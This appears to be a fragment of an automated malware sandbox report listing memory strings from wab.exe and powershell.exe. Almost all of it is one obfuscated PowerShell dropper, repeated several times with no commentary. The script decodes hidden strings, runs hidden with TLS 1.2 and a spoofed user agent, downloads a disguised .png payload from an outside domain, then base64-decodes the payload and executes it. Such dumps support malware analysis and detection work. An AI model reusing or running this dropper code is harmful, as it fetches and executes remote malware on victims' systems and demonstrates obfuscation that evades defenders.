Source: wab.exe, 0000000A.00000002.4222367203.0000000007252000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;
Source: powershell.exe, 00000005.00000002.2202717320.0000000007397000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_Process7860Win32_Processpowershell.exepowershell.exepowershell.exeWin32_ComputerSystemuser-PCWin32_OperatingSystem10.0.19045Microsoft Windows 10 Pro\|C:\Windows\|\Device\Harddisk0\Partition320240828120116.301492+000C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Slosh
Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
Source: powershell.exe, 00000002.00000002.2485251498.0000020B74913000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: powershell.exe-windowstylehiddenIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe
Source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(
Source: powershell.exe, 00000002.00000002.2485251498.0000020B748C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: osoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msilIndbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La '
Source: powershell.exe, 00000002.00000002.2485251498.0000020B748C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: !If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW 